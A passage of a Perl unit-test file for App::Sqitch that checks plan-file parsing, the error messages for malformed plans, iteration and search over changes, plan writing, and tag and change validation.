), 'And the SHA1 error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with a tag but no change.
$file = file qw(t plans tag-no-change.plan);
$fh = IO::File->new(\"$prags\@foo $tsnp\nbar $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with tag but no preceding change';
is $@->ident, 'parse', 'The missing change error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __x(
'Tag "{tag}" declared without a preceding change',
tag => 'foo',
),
), 'And the missing change error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with a duplicate tag name.
$file = file qw(t plans dupe-tag.plan);
$fh = $file->open('<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with dupe tag';
is $@->ident, 'parse', 'The dupe tag error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 12,
error => __x(
'Tag "{tag}" duplicates earlier declaration on line {line}',
tag => 'bar',
line => 7,
),
), 'And the missing change error message should be correct';
is sorted, 2, 'Should have sorted changes twice';
# Try a plan with a duplicate change within a tag section.
$file = file qw(t plans dupe-change.plan);
$fh = $file->open('<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with dupe change';
is $@->ident, 'parse', 'The dupe change error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 9,
error => __x(
'Change "{change}" duplicates earlier declaration on line {line}',
change => 'greets',
line => 7,
),
), 'And the dupe change error message should be correct';
is sorted, 1, 'Should have sorted changes once';
# Try a plan with an invalid requirement.
$fh = IO::File->new(\"\%project=foo\n\nfoo [^bar] $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse('badreq', $fh ) } 'App::Sqitch::X',
'Should die on invalid dependency';
is $@->ident, 'parse', 'The invalid dependency error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'badreq',
lineno => 3,
error => __x(
'"{dep}" is not a valid dependency specification',
dep => '^bar',
),
), 'And the invalid dependency error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with duplicate requirements.
$fh = IO::File->new(\"\%project=foo\n\nfoo [bar baz bar] $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse('dupedep', $fh ) } 'App::Sqitch::X',
'Should die on dupe dependency';
is $@->ident, 'parse', 'The dupe dependency error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'dupedep',
lineno => 3,
error => __x(
'Duplicate dependency "{dep}"',
dep => 'bar',
),
), 'And the dupe dependency error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan without a timestamp.
$file = file qw(t plans no-timestamp.plan);
$fh = IO::File->new(\"${prags}foo hi <t\@heo.ry>", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on change with no timestamp';
is $@->ident, 'parse', 'The missing timestamp error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __ 'Missing timestamp',
), 'And the missing timestamp error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan without a planner.
$file = file qw(t plans no-planner.plan);
$fh = IO::File->new(\"${prags}foo 2012-07-16T23:12:34Z", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on change with no planner';
is $@->ident, 'parse', 'The missing planner error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __ 'Missing planner name and email',
), 'And the missing planner error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with neither timestamp nor planner.
$file = file qw(t plans no-timestamp-or-planner.plan);
$fh = IO::File->new(\"%project=foo\n\nfoo", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on change with no timestamp or planner';
is $@->ident, 'parse', 'The missing timestamp or planner error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 3,
error => __ 'Missing timestamp and planner name and email',
), 'And the missing timestamp or planner error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with pragmas.
$file = file qw(t plans pragmas.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh),
'Should parse plan with pragmas"';
is sorted, 1, 'Should have sorted changes once';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
foo => 'bar',
project => 'pragmata',
uri => 'https://github.com/sqitchers/sqitch/',
strict => 1,
}, 'Should have captured all of the pragmas';
cmp_deeply $parsed, {
changes => [
clear,
change { name => 'hey' },
change { name => 'you' },
],
lines => [
clear,
prag( '', ' ', 'syntax-version', '', '=', '', App::Sqitch::Plan::SYNTAX_VERSION),
prag( ' ', '', 'foo', ' ', '=', ' ', 'bar', ' ', 'lolz'),
prag( '', ' ', 'project', '', '=', '', 'pragmata'),
prag( '', ' ', 'uri', '', '=', '', 'https://github.com/sqitchers/sqitch/'),
prag( '', ' ', 'strict'),
blank(),
change { name => 'hey' },
change { name => 'you' },
blank(),
],
}, 'Should have "multi.plan" lines and changes';
# Try a plan with deploy/revert operators.
$file = file qw(t plans deploy-and-revert.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh),
'Should parse plan with deploy and revert operators';
is sorted, 2, 'Should have sorted changes twice';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'deploy_and_revert',
}, 'Should have captured the deploy-and-revert pragmas';
cmp_deeply $parsed, {
changes => [
clear,
change { name => 'hey', op => '+' },
change { name => 'you', op => '+' },
change { name => 'dr_evil', op => '+ ', lspace => ' ' },
tag { name => 'foo' },
change { name => 'this/rocks', op => '+', pspace => ' ' },
change { name => 'hey-there', lspace => ' ' },
change {
name => 'dr_evil',
note => 'revert!',
op => '-',
rspace => ' ',
pspace => ' ',
rtag => [qw(dr_evil)],
},
tag { name => 'bar', lspace => ' ' },
],
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'deploy_and_revert'),
blank,
change { name => 'hey', op => '+' },
change { name => 'you', op => '+' },
change { name => 'dr_evil', op => '+ ', lspace => ' ' },
tag { name => 'foo', ret => 1 },
blank( ' '),
change { name => 'this/rocks', op => '+', pspace => ' ' },
change { name => 'hey-there', lspace => ' ' },
change {
name => 'dr_evil',
note => 'revert!',
op => '-',
rspace => ' ',
pspace => ' ',
rtag => [qw(dr_evil)],
},
tag { name => 'bar', lspace => ' ', ret => 1 },
],
}, 'Should have "deploy-and-revert.plan" lines and changes';
# Try a non-existent plan file with load().
$file = file qw(t hi nonexistent.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
throws_ok { App::Sqitch::Plan->new(sqitch => $sqitch, target => $target)->load } 'App::Sqitch::X',
'Should get exception for nonexistent plan file';
is $@->ident, 'plan', 'Nonexistent plan file ident should be "plan"';
is $@->message, __x(
'Plan file {file} does not exist',
file => $file,
), 'Nonexistent plan file message should be correct';
# Try a plan with dependencies.
$file = file qw(t plans dependencies.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target), $CLASS,
'Plan with sqitch with plan file with dependencies';
is $plan->file, $target->plan_file, 'File should be copied from Sqitch';
ok $parsed = $plan->load, 'Load plan with dependencies file';
is_deeply $parsed->{changes}, [
clear,
change { name => 'roles', op => '+' },
change { name => 'users', op => '+', pspace => ' ', requires => ['roles'] },
change { name => 'add_user', op => '+', pspace => ' ', requires => [qw(users roles)] },
change { name => 'dr_evil', op => '+' },
tag { name => 'alpha' },
change {
name => 'users',
op => '+',
pspace => ' ',
requires => ['users@alpha'],
rtag => [qw(dr_evil add_user users)],
},
change { name => 'dr_evil', op => '-', rtag => [qw(dr_evil)] },
change {
name => 'del_user',
op => '+',
pspace => ' ',
requires => ['users'],
conflicts => ['dr_evil']
},
], 'The changes should include the dependencies';
is sorted, 2, 'Should have sorted changes twice';
# Try a plan with cross-project dependencies.
$file = file qw(t plans project_deps.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target), $CLASS,
'Plan with sqitch with plan file with project deps';
is $plan->file, $target->plan_file, 'File should be copied from Sqitch';
ok $parsed = $plan->load, 'Load plan with project deps file';
is_deeply $parsed->{changes}, [
clear,
change { name => 'roles', op => '+' },
change { name => 'users', op => '+', pspace => ' ', requires => ['roles'] },
change { name => 'add_user', op => '+', pspace => ' ', requires => [qw(users roles log:logger)] },
change { name => 'dr_evil', op => '+' },
tag { name => 'alpha' },
change {
name => 'users',
op => '+',
pspace => ' ',
requires => ['users@alpha'],
rtag => [qw(dr_evil add_user users)],
},
change { name => 'dr_evil', op => '-', rtag => [qw(dr_evil)] },
change {
name => 'del_user',
op => '+',
pspace => ' ',
requires => ['users', 'log:logger@beta1'],
conflicts => ['dr_evil']
},
], 'The changes should include the cross-project deps';
is sorted, 2, 'Should have sorted changes twice';
# Should fail with dependencies on tags.
$file = file qw(t plans tag_dependencies.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
$fh = IO::File->new(\"%project=tagdep\n\nfoo $tsnp\n\@bar [:foo] $tsnp", '<:utf8_strict');
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
$CLASS, 'Plan with sqitch with plan with tag dependencies';
is $plan->file, $target->plan_file, 'File should be copied from Sqitch';
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should get an exception for tag with dependencies';
is $@->ident, 'parse', 'The tag dependencies error ident should be "plan"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __ 'Tags may not specify dependencies',
), 'And the tag dependencies error message should be correct';
# Make sure that lines() loads the plan.
$file = file qw(t plans multi.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target), $CLASS,
'Plan with sqitch with plan file';
is $plan->file, $target->plan_file, 'File should be copied from Sqitch';
cmp_deeply [$plan->lines], [
clear,
version,
prag( '', '', 'project', '', '=', '', 'multi'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
blank(' '),
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
], 'Lines should be parsed from file';
$vivify = 1;
cmp_deeply [$plan->changes], [
clear,
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar' },
tag { name => 'baz' },
], 'Changes should be parsed from file';
clear;
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' };
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' };
my $foo_tag = tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
};
change { name => 'this/rocks', pspace => ' ' };
change { name => 'hey-there', rspace => ' ', note => 'trailing note!' };
cmp_deeply [$plan->tags], [
$foo_tag,
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
], 'Should get all tags from tags()';
is sorted, 2, 'Should have sorted changes twice';
ok $parsed = $plan->load, 'Load should parse plan from file';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'multi',
}, 'Should have captured the multi pragmas';
$vivify = 0;
cmp_deeply $parsed, {
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'multi'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
blank(' '),
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
],
changes => [
clear,
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar' },
tag { name => 'baz' },
],
}, 'And the parsed file should have lines and changes';
is sorted, 2, 'Should have sorted changes twice';
##############################################################################
# Test the interator interface.
can_ok $plan, qw(
index_of
contains
get
seek
reset
next
current
peek
do
);
is $plan->position, -1, 'Position should start at -1';
is $plan->current, undef, 'Current should be undef';
ok my $change = $plan->next, 'Get next change';
isa_ok $change, 'App::Sqitch::Plan::Change', 'First change';
is $change->name, 'hey', 'It should be the first change';
is $plan->position, 0, 'Position should be at 0';
is $plan->count, 4, 'Count should be 4';
is $plan->current, $change, 'Current should be current';
is $plan->change_at(0), $change, 'Should get first change from change_at(0)';
ok my $next = $plan->peek, 'Peek to next change';
isa_ok $next, 'App::Sqitch::Plan::Change', 'Peeked change';
is $next->name, 'you', 'Peeked change should be second change';
is $plan->last->format_name, 'hey-there', 'last() should return last change';
is $plan->current, $change, 'Current should still be current';
is $plan->peek, $next, 'Peek should still be next';
is $plan->next, $next, 'Next should be the second change';
is $plan->position, 1, 'Position should be at 1';
is $plan->change_at(1), $next, 'Should get second change from change_at(1)';
ok my $third = $plan->peek, 'Peek should return an object';
isa_ok $third, 'App::Sqitch::Plan::Change', 'Third change';
is $third->name, 'this/rocks', 'It should be the third change';
is $plan->current, $next, 'Current should be the second change';
is $plan->next, $third, 'Should get third change next';
is $plan->position, 2, 'Position should be at 2';
is $plan->current, $third, 'Current should be third change';
is $plan->change_at(2), $third, 'Should get third change from change_at(2)';
ok my $fourth = $plan->next, 'Get fourth change';
isa_ok $fourth, 'App::Sqitch::Plan::Change', 'Fourth change';
is $fourth->name, 'hey-there', 'Fourth change should be "hey-there"';
is $plan->position, 3, 'Position should be at 3';
is $plan->peek, undef, 'Peek should return undef';
is $plan->next, undef, 'Next should return undef';
is $plan->position, 4, 'Position should be at 4';
is $plan->next, undef, 'Next should still return undef';
is $plan->position, 4, 'Position should still be at 4';
ok $plan->reset, 'Reset the plan';
is $plan->position, -1, 'Position should be back at -1';
is $plan->current, undef, 'Current should still be undef';
is $plan->next, $change, 'Next should return the first change again';
is $plan->position, 0, 'Position should be at 0 again';
is $plan->current, $change, 'Current should be first change';
is $plan->index_of($change->name), 0, "Index of change should be 0";
ok $plan->contains($change->name), 'Plan should contain change';
is $plan->get($change->name), $change, 'Should be able to get change 0 by name';
is $plan->find($change->name), $change, 'Should be able to find change 0 by name';
is $plan->get($change->id), $change, 'Should be able to get change 0 by ID';
is $plan->find($change->id), $change, 'Should be able to find change 0 by ID';
is $plan->index_of('@bar'), 3, 'Index of @bar should be 3';
ok $plan->contains('@bar'), 'Plan should contain @bar';
is $plan->get('@bar'), $fourth, 'Should be able to get hey-there via @bar';
is $plan->get($fourth->id), $fourth, 'Should be able to get hey-there via @bar ID';
is $plan->find('@bar'), $fourth, 'Should be able to find hey-there via @bar';
is $plan->find($fourth->id), $fourth, 'Should be able to find hey-there via @bar ID';
ok $plan->seek('@bar'), 'Seek to the "@bar" change';
is $plan->position, 3, 'Position should be at 3 again';
is $plan->current, $fourth, 'Current should be fourth again';
is $plan->index_of('you'), 1, 'Index of you should be 1';
ok $plan->contains('you'), 'Plan should contain "you"';
is $plan->get('you'), $next, 'Should be able to get change 1 by name';
is $plan->find('you'), $next, 'Should be able to find change 1 by name';
ok $plan->seek('you'), 'Seek to the "you" change';
is $plan->position, 1, 'Position should be at 1 again';
is $plan->current, $next, 'Current should be second again';
is $plan->index_of('baz'), undef, 'Index of baz should be undef';
ok !$plan->contains('baz'), 'Plan should not contain "baz"';
is $plan->index_of('@baz'), 3, 'Index of @baz should be 3';
ok $plan->contains('@baz'), 'Plan should contain @baz';
ok $plan->seek('@baz'), 'Seek to the "baz" change';
is $plan->position, 3, 'Position should be at 3 again';
is $plan->current, $fourth, 'Current should be fourth again';
is $plan->change_at(0), $change, 'Should still get first change from change_at(0)';
is $plan->change_at(1), $next, 'Should still get second change from change_at(1)';
is $plan->change_at(2), $third, 'Should still get third change from change_at(2)';
# Make sure seek() chokes on a bad change name.
throws_ok { $plan->seek('nonesuch') } 'App::Sqitch::X',
'Should die seeking invalid change';
is $@->ident, 'plan', 'Invalid seek change error ident should be "plan"';
is $@->message, __x(
'Cannot find change "{change}" in plan',
change => 'nonesuch',
), 'And the failure message should be correct';
# Get all!
my @changes = ($change, $next, $third, $fourth);
cmp_deeply [$plan->changes], \@changes, 'All should return all changes';
ok $plan->reset, 'Reset the plan again';
$plan->do(sub {
is shift, $changes[0], 'Change ' . $changes[0]->name . ' should be passed to do sub';
is $_, $changes[0], 'Change ' . $changes[0]->name . ' should be the topic in do sub';
shift @changes;
});
# There should be no more to iterate over.
$plan->do(sub { fail 'Should not get anything passed to do()' });
##############################################################################
# Let's try searching changes.
isa_ok my $iter = $plan->search_changes, 'CODE',
'search_changes() should return a code ref';
my $get_all_names = sub {
my $iter = shift;
my @res;
while (my $change = $iter->()) {
push @res => $change->name;
}
return \@res;
};
is_deeply $get_all_names->($iter), [qw(hey you this/rocks hey-there)],
'All the changes should be returned in the proper order';
# Try reverse order.
is_deeply $get_all_names->( $plan->search_changes( direction => 'DESC' ) ),
[qw(hey-there this/rocks you hey)], 'Direction "DESC" should work';
# Try invalid directions.
throws_ok { $plan->search_changes( direction => 'foo' ) } 'App::Sqitch::X',
'Should get error for invalid direction';
is $@->ident, 'DEV', 'Invalid direction error ident should be "DEV"';
is $@->message, 'Search direction must be either "ASC" or "DESC"',
'Invalid direction error message should be correct';
# Try ascending lowercased.
is_deeply $get_all_names->( $plan->search_changes( direction => 'asc' ) ),
[qw(hey you this/rocks hey-there)], 'Direction "asc" should work';
# Try change name.
is_deeply $get_all_names->( $plan->search_changes( name => 'you')),
[qw(you)], 'Search by change name should work';
is_deeply $get_all_names->( $plan->search_changes( name => 'hey')),
[qw(hey hey-there)], 'Search by change name should work as a regex';
is_deeply $get_all_names->( $plan->search_changes( name => '[-/]')),
[qw(this/rocks hey-there)],
'Search by change name should with a character class';
# Try planner name.
is_deeply $get_all_names->( $plan->search_changes( planner => 'Barack' ) ),
[qw(this/rocks hey-there)], 'Search by planner should work';
is_deeply $get_all_names->( $plan->search_changes( planner => 'a..a' ) ),
[qw(you)], 'Search by planner should work as a regex';
# Search by operation.
is_deeply $get_all_names->( $plan->search_changes( operation => 'deploy' ) ),
[qw(hey you this/rocks hey-there)], 'Search by operation "deploy" should work';
is_deeply $get_all_names->( $plan->search_changes( operation => 'revert' ) ),
[], 'Search by operation "revert" should return nothing';
# Fake out an operation.
my $mock_change = Test::MockModule->new('App::Sqitch::Plan::Change');
$mock_change->mock( operator => sub { return shift->name =~ /hey/ ? '-' : '+' });
is_deeply $get_all_names->( $plan->search_changes( operation => 'DEPLOY' ) ),
[qw(you this/rocks)], 'Search by operation "DEPLOY" should now return two changes';
is_deeply $get_all_names->( $plan->search_changes( operation => 'REVERT' ) ),
[qw(hey hey-there)], 'Search by operation "REVERT" should return the other two';
$mock_change->unmock_all;
# Make sure we test only for legal operations.
throws_ok { $plan->search_changes( operation => 'foo' ) } 'App::Sqitch::X',
'Should get an error for unknown operation';
is $@->ident, 'DEV', 'Unknown operation error ident should be "DEV"';
is $@->message, 'Unknown change operation "foo"',
'Unknown operation error message should be correct';
# Test offset and limit.
is_deeply $get_all_names->( $plan->search_changes( offset => 2 ) ),
[qw(this/rocks hey-there)], 'Search with offset 2 should work';
is_deeply $get_all_names->( $plan->search_changes( offset => 2, limit => 1 ) ),
[qw(this/rocks)], 'Search with offset 2, limit 1 should work';
is_deeply $get_all_names->( $plan->search_changes( offset => 3, direction => 'desc' ) ),
[qw(hey)], 'Search with offset 3 and direction "desc" should work';
is_deeply $get_all_names->( $plan->search_changes( offset => 2, limit => 1, direction => 'desc' ) ),
[qw(you)], 'Search with offset 2, limit 1, direction "desc" should work';
##############################################################################
# Test writing the plan.
can_ok $plan, 'write_to';
my $to = file 'plan.out';
END { unlink $to }
file_not_exists_ok $to;
ok $plan->write_to($to), 'Write out the file';
file_exists_ok $to;
my $v = App::Sqitch->VERSION;
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. $file->slurp(iomode => '<:utf8_strict'),
'The contents should look right';
# Make sure it will start from a certain point.
ok $plan->write_to($to, 'this/rocks'), 'Write out the file from "this/rocks"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. $plan->find('this/rocks')->as_string . "\n"
. $plan->find('hey-there')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('hey-there')->tags ) . "\n",
'Plan should have been written from "this/rocks" through tags at end';
# Make sure it ends at a certain point.
ok $plan->write_to($to, undef, 'you'), 'Write the file up to "you"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. '# And there was a blank line.' . "\n"
. "\n"
. $plan->find('hey')->as_string . "\n"
. $plan->find('you')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('you')->tags ) . "\n",
'Plan should have been written through "you" and its tags';
# Try both.
ok $plan->write_to($to, '@foo', 'this/rocks'),
'Write from "@foo" to "this/rocks"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. $plan->find('you')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('you')->tags ) . "\n"
. ' ' . "\n"
. $plan->find('this/rocks')->as_string . "\n",
'Plan should have been written from "@foo" to "this/rocks"';
# End with a tag.
ok $plan->write_to($to, 'hey', '@foo'), 'Write from "hey" to "@foo"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. $plan->find('hey')->as_string . "\n"
. $plan->find('you')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('you')->tags ) . "\n",
'Plan should have been written from "hey" through "@foo"';
##############################################################################
# Test _is_valid.
can_ok $plan, '_is_valid';
for my $name (@bad_names) {
throws_ok { $plan->_is_valid( tag => $name) } 'App::Sqitch::X',
qq{Should find "$name" invalid};
is $@->ident, 'plan', qq{Invalid name "$name" error ident should be "plan"};
is $@->message, __x(
qq{"{name}" is invalid: tags must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
name => $name,
), qq{And the "$name" error message should be correct};
}
# Try some valid names.
for my $name (
'foo', # alpha
'12', # digits
't', # char
'6', # digit
'阱阪阬', # multibyte
'foo/bar', # middle punct
'beta1', # ending digit
'v1.2-1', # version number with dash
'v1.2+1', # version number with plus
'v1.2_1', # version number with underscore
) {
local $ENV{FOO} = 1;
my $disp = Encode::encode_utf8($name);
ok $plan->_is_valid(change => $name), qq{Name "$disp" should be valid};
}
##############################################################################
# Try adding a tag.
ok my $tag = $plan->tag( name => 'w00t' ), 'Add tag "w00t"';
is $plan->count, 4, 'Should have 4 changes';
ok $plan->contains('@w00t'), 'Should find "@w00t" in plan';
is $plan->index_of('@w00t'), 3, 'Should find "@w00t" at index 3';
is $plan->last->name, 'hey-there', 'Last change should be "hey-there"';
is_deeply [map { $_->name } $plan->last->tags], [qw(bar baz w00t)],
'The w00t tag should be on the last change';
isa_ok $tag, 'App::Sqitch::Plan::Tag';
is $tag->name, 'w00t', 'The returned tag should be @w00t';
is $tag->change, $plan->last, 'The @w00t change should be the last change';
ok $plan->write_to($to), 'Write out the file again';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. $file->slurp(iomode => '<:utf8_strict')
. $tag->as_string . "\n",
{ encoding => 'UTF-8' },
'The contents should include the "w00t" tag';
# Try passing the tag name with a leading @.
ok my $tag2 = $plan->tag( name => '@alpha' ), 'Add tag "@alpha"';
ok $plan->contains('@alpha'), 'Should find "@alpha" in plan';
is $plan->index_of('@alpha'), 3, 'Should find "@alpha" at index 3';
is $tag2->name, 'alpha', 'The returned tag should be @alpha';
is $tag2->change, $plan->last, 'The @alpha change should be the last change';
# Try specifying the change to tag.
ok my $tag3 = $plan->tag(name => 'blarney', change => 'you'),
'Tag change "you"';
is $plan->count, 4, 'Should still have 4 changes';
ok $plan->contains('@blarney'), 'Should find "@blarney" in plan';
is $plan->index_of('@blarney'), 1, 'Should find "@blarney" at index 1';
is_deeply [map { $_->name } $plan->change_at(1)->tags], [qw(foo blarney)],
'The blarney tag should be on the second change';
isa_ok $tag3, 'App::Sqitch::Plan::Tag';
is $tag3->name, 'blarney', 'The returned tag should be @blarney';
is $tag3->change, $plan->change_at(1), 'The @blarney change should be the second change';
# Should choke on a duplicate tag.
throws_ok { $plan->tag( name => 'w00t' ) } 'App::Sqitch::X',
'Should get error trying to add duplicate tag';
is $@->ident, 'plan', 'Duplicate tag error ident should be "plan"';
is $@->message, __x(
'Tag "{tag}" already exists',
tag => '@w00t',
), 'And the error message should report it as a dupe';
# Should choke on an invalid tag names.
for my $name (@bad_names, 'foo#bar') {
next if $name =~ /^@/;
throws_ok { $plan->tag( name => $name ) } 'App::Sqitch::X',
qq{Should get error for invalid tag "$name"};
is $@->ident, 'plan', qq{Invalid name "$name" error ident should be "plan"};
is $@->message, __x(
qq{"{name}" is invalid: tags must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
name => $name,
), qq{And the "$name" error message should be correct};
}
# Validate reserved names.
for my $reserved (qw(HEAD ROOT)) {
throws_ok { $plan->tag( name => $reserved ) } 'App::Sqitch::X',
qq{Should get error for reserved tag "$reserved"};
is $@->ident, 'plan', qq{Reserved tag "$reserved" error ident should be "plan"};
is $@->message, __x(
'"{name}" is a reserved name',
name => $reserved,
), qq{And the reserved tag "$reserved" message should be correct};
}
throws_ok { $plan->tag( name => $sha1 ) } 'App::Sqitch::X',
'Should get error for a SHA1 tag';
is $@->ident, 'plan', 'SHA1 tag error ident should be "plan"';
is $@->message, __x(
'"{name}" is invalid because it could be confused with a SHA1 ID',
    name => $sha1,
), 'And the reserved name error should be output';
##############################################################################
# Try adding a change.
ok my $new_change = $plan->add(name => 'booyah', note => 'Hi there'),
'Add change "booyah"';
is $plan->count, 5, 'Should have 5 changes';
ok $plan->contains('booyah'), 'Should find "booyah" in plan';
is $plan->index_of('booyah'), 4, 'Should find "booyah" at index 4';
is $plan->last->name, 'booyah', 'Last change should be "booyah"';
isa_ok $new_change, 'App::Sqitch::Plan::Change';
is $new_change->as_string, join (' ',
'booyah',
$new_change->timestamp->as_string,
$new_change->format_planner,
$new_change->format_note,
), 'Should have plain stringification of "booyah"';
my $contents = $file->slurp(iomode => '<:utf8_strict');
$contents =~ s{(\s+this/rocks)}{"\n" . $tag3->as_string . $1}ems;
ok $plan->write_to($to), 'Write out the file again';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. $contents
. $tag->as_string . "\n"
. $tag2->as_string . "\n\n"
. $new_change->as_string . "\n",
{ encoding => 'UTF-8' },
'The contents should include the "booyah" change';
# Make sure dependencies are verified.
ok $new_change = $plan->add(name => 'blow', requires => ['booyah']),
'Add change "blow"';
is $plan->count, 6, 'Should have 6 changes';
ok $plan->contains('blow'), 'Should find "blow" in plan';
is $plan->index_of('blow'), 5, 'Should find "blow" at index 5';
is $plan->last->name, 'blow', 'Last change should be "blow"';
is $new_change->as_string,
'blow [booyah] ' . $new_change->timestamp->as_string . ' '
. $new_change->format_planner,
'Should have nice stringification of "blow [booyah]"';
is [$plan->lines]->[-1], $new_change,
'The new change should have been appended to the lines, too';
# Make sure dependencies are unique.
ok $new_change = $plan->add(name => 'jive', requires => [qw(blow blow)]),
'Add change "jive" with dupe dependency';
is $plan->count, 7, 'Should have 7 changes';
ok $plan->contains('jive'), 'Should find "jive" in plan';
is $plan->index_of('jive'), 6, 'Should find "jive" at index 6';
